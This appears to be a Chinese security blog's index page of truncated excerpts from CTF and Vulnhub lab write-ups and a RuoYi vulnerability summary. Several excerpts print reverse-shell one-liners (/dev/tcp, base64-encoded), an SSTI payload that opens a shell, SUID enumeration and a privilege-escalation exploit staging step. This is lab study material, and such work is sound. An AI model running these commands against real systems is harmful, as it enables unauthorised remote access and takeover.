puff-pastry
前言靶机地址https://github.com/CTF-Archives/Puff-Pastr 靶机拓扑图如下 渗透过程shiro发现rememberme字段,直接使用shiro工具进行rce就可以 然后 1cat /flag.txt 下一步就是反弹shell,直接执行命令 1bash -i >& /dev/tcp/192.168.141.112/4444 0>&1 不行,换一种方式 1bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0MS4xMTIvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}' 1echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0MS4xMTIvNDQ0NCAwPiYx | base64 -d > /tmp/shell.sh 这里出现一点小乌龙,就是用shiro工具有的可以执行反弹shell,有点不行,连写...
Vulnhub-Tempus-Fugit-3
信息搜集1arp-scan -l 扫描一下端口 !!!怎么80没有开,访问网站也是访问不了不知道哪里出了问题。这里又换了成了VirtualBox打开,再扫一次 后来又摸索了一下,发现是kali在nat模式,在桥接模式下的配置没有配好,桥接网卡选择本机的无线网卡就可以了。也是 扫一下目录 1gobuster dir -u http://192.168.141.109 -w medium.txt -x php,txt,zip,html 漏洞利用访问/login,/logout都会重定向到首页,抓包看一下 啥也没有,就是写一个重定向,这里设计得很巧妙啊,没想到是在报错页面存在一个ssti,404页面抓个包 然后就是反弹shell 1{{request.application.__globals__.__builtins__.__import__('os').popen("bash -c 'bash -i >& /dev/tcp/192.168.141.112/4444 0&g...
Vulnhub-Web-Machine-N7
环境准备这个靶机比较特殊,不能直接导入到vm中,需要使用VirtualBox。一开始调试了好久也没能把这个虚拟机导入到vm中,后来妥协了,把kali和这个靶机都改为桥接模式 根据这个MAC地址来分辨哪一个是靶机的ip 然后就可以了。 信息搜集扫描网段中存活的主机 1arp-scan -l 对应MAC地址知道靶机ip为192.168.141.136 下一步扫描一下端口 仅开放了80端口 扫一下目录 1gobuster dir -u 'http://192.168.141.136' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak 扫出来3个文件,index.html,profile.php,exploit.html 漏洞利用接下来访问一下,发现一个文件上传,上传木马就直接404了 看一下这个html源代码 123456789101112<html> <!-- CSRF PoC - generated by Bu...
Vulnhub-DC-4
信息搜集扫描网段查看有一下存活的主机 1arp-scan -l 192.168.100.138就是靶机ip,看一下开放端口 开放22端口和80端口。 扫一下目录 漏洞利用访问靶机是一个登入页面,尝试sqlmap失败,根据页面提示应该是admin用户,尝试爆破密码 爆破出密码为happy,然后是有一个命令执行,抓包看一下,存在rce尝试写马没有成功,然后就反弹shell,这个要注意空格要改为+, 反弹之后获取交互式shell 1python -c "import pty; pty.spawn('/bin/bash')" 接下来就是提权,先看一下suid提权 1find / -user root -perm -4000 -print 2>/dev/null 查看一下exim4的版本 该版本存在提权漏洞,找一下提权脚本 在靶机中运行脚本就行。 12cp /usr/share/exploitdb/exploits/linux/local/46996.sh .python -m http.server 7777 然后在靶...
Vulnhub-Matrix-Breakout
前言暑期过半,前一段时间松懈有些浮躁。还是需要静下心来沉淀,茶需慢慢摇,心急则味散。靶机所需要的环境配置这里就不过多赘述 信息搜集首先扫描一下网段存活的主机 1arp-scan -l 我们需要渗透的靶机ip就是192.168.100.133 扫描一下端口 开放了3个端口 目录扫描,常规扫描不行,这里要上点手段 12gobuster dir -u 192.168.100.133 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,bak,txt,html 漏洞利用访问/graffiti.php有一个输入框,抓包看一下 经过测试message的参数会写进graffiti.txt文件中,并且还存在储存型xss,但是没啥用。同理尝试读一下graffiti.php 1234567891011121314151617181920<?php$file="graffiti.txt";if($_SERVER['REQUEST_METHOD'...
好靶场古法赛道-流量分析
流量分析FTP流量分析首先netA现分析一波,直接分析出了登入的用户密码,还有导出的文件, 接下来分析流量包 1.提交攻击者 IP过滤ftp流量之后 统计->会话->IPv4 攻击者ip是192.168.39.88,受害者ip为192.168.39.90. 2.攻击者对哪个网段进行了存活探测?发现了多少台存活主机?统计->端点->IPv4 如图存在一个局域网``,内网地址是 123456789192.168.39.1192.168.39.2192.168.39.88192.168.39.89192.168.39.90192.168.39.91192.168.39.92192.168.39.254192.168.39.255 广播地址为192.168.39.255,网络网安设备192.168.39.254,192.168.39.1。剩余7个 答案为192.168.39.0/24,7 3.受害服务器开放了哪些常见端口?攻击者存在端口扫描行为,查看开放端口过滤语法为 1ip.src==192.168.39.90 &&a...
若依框架漏洞
前言参加完今年的御网杯线下赛,在渗透部分考到的是一个若依框架被打蒙了,趁着假期系统总结一下。 简介Ruoyi(若依)是一款基于Spring Boot和Vue.js开发的快速开发平台。它提供了许多常见的后台管理系统所需的功能和组件,包括权限管理、定时任务、代码生成、日志管理等。Ruoyi的目标是帮助开发者快速搭建后台管理系统,提高开发效率。若依有很多版本,其中使用最多的是Ruoyi单应用版本(RuoYi),Ruoyi前后端分离版本(RuoYi-Vue),Ruoyi微服务版本(RuoYi-Cloud),Ruoyi移动版本(RuoYi-App)。 ruoyi历史漏洞主要包括shiro反序列化,ssti,sql注入,任意文件下载,定时任务远程rce等等,Shiro反序列化漏洞适用于RuoYi V-4.6.2之前的版本,SSTI漏洞适用于V-4.7.1版本,SQL注入适用于<V-4.6.2版本。任意文件下载漏洞适用于所有版本V-4.7.8之前,定时任务远程RCE适用于<V-4.7.2版本。 环境搭建首先获取一下源代码 1git clone https://gitee.com/y...
Vulnhub-DC-3
信息搜集首先信息搜集,扫描网段发现靶机ip192.168.100.136 1arp-scan -l nmap扫一下端口 1nmap -sV 192.168.100.136 开放了80端口,web指纹信息 1whatweb -v 192.168.100.136 Web 服务:Apache/2.4.18 (Ubuntu) CMS:Joomla 全站程序(MetaGenerator 标识) 前端组件:Bootstrap、jQuery、HTML5 页面存在密码输入框PasswordField[password] → /administrator后台登录页存在 存在 Joomla 会话 Cookie,确认站点正常运行 访问一下网站 这次只有一个 flag,一个入口点,没有任何线索。 要拿到 flag,你显然需要获得 root 权限。 如何获得 root 权限取决于你——当然,也取决于系统。 祝你好运——希望你能享受这个小挑战。:-) 漏洞利用分析知道cms是Joomla,使用joomscan分析下版本 1joomscan -url 192.168.100.136 ...
Vulnhub-DC:2
环境配置修改模式改为NAT模式 当前网段为192.168.100.0/24 信息搜集首先扫描网段 1arp-scan -l 192.168.100.135就是目标靶机。nmap扫描一下 1nmap -A 192.168.100.135 扫描结果有80端口, Apache httpd 2.4.10 ((Debian)), 1Did not follow redirect to http://dc-2/ 访问ip被重定向到http://dc-2 首先配置host文件,在C:\Windows\System32\drivers\etc\host在文件末尾中添加 1192.168.100.135 DC-2 再执行 1ipconfig /flushdns 就可以访问网站。 web指纹信息 1whatweb -v 192.168.100.135 WordPress 4.7.10 + Apache2.4.10 Debian 漏洞利用首先访问网站就可以得到flag1 你常用的单词列表可能不管用,所以,或许你需要发挥一下自己的特长...
